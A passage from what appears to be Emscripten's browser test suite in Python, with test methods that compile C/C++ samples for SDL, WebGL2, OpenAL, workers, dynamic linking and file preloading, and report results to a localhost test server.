self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.run_process([EMCC, 'supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
self.btest_exit('main.cpp', args=['-DBROWSER=1', '-s', 'MAIN_MODULE', '-O2', 'supp.wasm', '-s', 'EXPORT_ALL'], assert_returncode=76)
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency();
out('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
@no_wasm_backend('mem init file')
def test_mem_init(self):
create_file('pre.js', '''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
create_file('post.js', '''
var assert = function(check, text) {
if (!check) {
console.log('assert failed: ' + text);
maybeReportResultToServer(9);
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''')
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
@no_wasm_backend('mem init file')
def test_mem_init_request(self):
def test(what, status):
print(what, status)
create_file('pre.js', '''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.port)
self.btest('mem_init_request.cpp', expected=status, args=['-s', 'WASM=0', '--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
out('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
out('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
out('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
out('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// Run on the next event loop, as code may run in a postRun right after main().
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 0);
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
''' % self.port
create_file('pre_runtime.js', r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
('runtime_misuse_2.cpp', ['--pre-js', 'pre_runtime.js'], 601) # 601, because no main means we *do* run another call after exit()
]:
for mode in [[], ['-s', 'WASM=0']]:
print('\n', filename, extra_args, mode)
print('mem init, so async, call too early')
create_file('post.js', post_prep + post_test + post_hook)
self.btest(filename, expected='600', args=['--post-js', 'post.js', '--memory-init-file', '1', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync startup, call too late')
create_file('post.js', post_prep + 'Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected=str(second_code), args=['--post-js', 'post.js', '-s', 'EXIT_RUNTIME'] + extra_args + mode, reporting=Reporting.NONE)
print('sync, runtime still alive, so all good')
create_file('post.js', post_prep + 'expected_ok = true; Module.postRun.push(function() { ' + post_test + ' });' + post_hook)
self.btest(filename, expected='606', args=['--post-js', 'post.js'] + extra_args + mode, reporting=Reporting.NONE)
def test_cwrap_early(self):
self.btest(os.path.join('browser', 'cwrap_early.cpp'), args=['-O2', '-s', 'ASSERTIONS', '--pre-js', test_file('browser', 'cwrap_early.js'), '-s', 'EXPORTED_RUNTIME_METHODS=[cwrap]'], expected='0')
def test_worker_api(self):
self.compile_btest([test_file('worker_api_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_main.cpp', expected='566')
def test_worker_api_2(self):
self.compile_btest([test_file('worker_api_2_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-O2', '--minify=0', '-s', 'EXPORTED_FUNCTIONS=_one,_two,_three,_four', '--closure=1'])
self.btest('worker_api_2_main.cpp', args=['-O2', '--minify=0'], expected='11')
def test_worker_api_3(self):
self.compile_btest([test_file('worker_api_3_worker.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one'])
self.btest('worker_api_3_main.cpp', expected='5')
def test_worker_api_sleep(self):
self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-s', 'BUILD_AS_WORKER', '-s', 'EXPORTED_FUNCTIONS=_one', '-s', 'ASYNCIFY'])
self.btest('worker_api_main.cpp', expected='566')
def test_emscripten_async_wget2(self):
self.btest('test_emscripten_async_wget2.cpp', expected='0')
def test_module(self):
self.run_process([EMCC, test_file('browser_module.cpp'), '-o', 'lib.wasm', '-O2', '-s', 'SIDE_MODULE', '-s', 'EXPORTED_FUNCTIONS=_one,_two'])
self.btest('browser_main.cpp', args=['-O2', '-s', 'MAIN_MODULE'], expected='8')
@parameterized({
'non-lz4': ([],),
'lz4': (['-s', 'LZ4'],)
})
def test_preload_module(self, args):
create_file('library.c', r'''
#include <stdio.h>
int library_func() {
return 42;
}
''')
self.run_process([EMCC, 'library.c', '-s', 'SIDE_MODULE', '-O2', '-o', 'library.wasm', '-s', 'EXPORT_ALL'])
os.rename('library.wasm', 'library.so')
create_file('main.c', r'''
#include <dlfcn.h>
#include <stdio.h>
#include <emscripten.h>
int main() {
int found = EM_ASM_INT(
return Module['preloadedWasm']['/library.so'] !== undefined;
);
if (!found) {
return 1;
}
void *lib_handle = dlopen("/library.so", RTLD_NOW);
if (!lib_handle) {
return 2;
}
typedef int (*voidfunc)();
voidfunc x = (voidfunc)dlsym(lib_handle, "library_func");
if (!x || x() != 42) {
return 3;
}
return 0;
}
''')
self.btest_exit(
'main.c',
args=['-s', 'MAIN_MODULE', '--preload-file', '.@/', '-O2', '--use-preload-plugins', '-s', 'EXPORT_ALL'] + args)
def test_mmap_file(self):
create_file('data.dat', 'data from the file ' + ('.' * 9000))
self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat'])
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest('hello_world_gles.c', expected='0', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '-O2', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid', 'test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = open('test.js').read()
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid', 'test.js'))
try_delete(test_file('uuid', 'test.js.map'))
# Now run test in browser
self.btest(test_file('uuid', 'test.c'), '1', args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-s', 'HTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],),
'legacy': (['-s', 'MIN_FIREFOX_VERSION=0', '-s', 'MIN_SAFARI_VERSION=0', '-s', 'MIN_IE_VERSION=0', '-s', 'MIN_EDGE_VERSION=0', '-s', 'MIN_CHROME_VERSION=0'],)
})
@requires_threads
def test_html5_core(self, opts):
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
print(opts)
self.btest(test_file('test_gamepad.c'), args=[] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS']]:
print(opts)
self.btest(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(test_file('webgl_create_context2.cpp'), expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -s DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser', 'html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
def test_webgl_unmasked_vendor_webgl(self):
self.btest(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
['-s', 'MIN_CHROME_VERSION=0'],
['-O2', '-g1', '--closure=1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(test_file('webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')
def test_webgl2_objects(self):
self.btest(test_file('webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
def test_html5_webgl_api(self):
for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest(test_file('html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')
def test_webgl2_ubos(self):
self.btest(test_file('webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
self.btest(test_file('webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest(test_file('test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(test_file('webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure=1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(test_file('webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget.c'), expected='1', args=['-s', 'ASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest(test_file('test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASYNCIFY'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=_main,_one', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
